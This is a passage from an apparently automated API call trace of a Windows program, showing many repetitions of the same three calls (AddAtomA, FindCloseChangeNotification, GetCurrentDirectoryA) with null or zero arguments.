0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.944] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.945] AddAtomA (lpString=0x0) returned 0x0 [0164.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.946] AddAtomA (lpString=0x0) returned 0x0 [0164.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.947] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.948] AddAtomA (lpString=0x0) returned 0x0 [0164.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.949] AddAtomA (lpString=0x0) returned 0x0 [0164.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.950] AddAtomA (lpString=0x0) returned 0x0 [0164.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.951] AddAtomA (lpString=0x0) returned 0x0 [0164.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.952] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.953] AddAtomA (lpString=0x0) returned 0x0 [0164.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.954] AddAtomA (lpString=0x0) returned 0x0 [0164.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.955] AddAtomA (lpString=0x0) returned 0x0 [0164.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.956] AddAtomA (lpString=0x0) returned 0x0 [0164.956] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.956] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 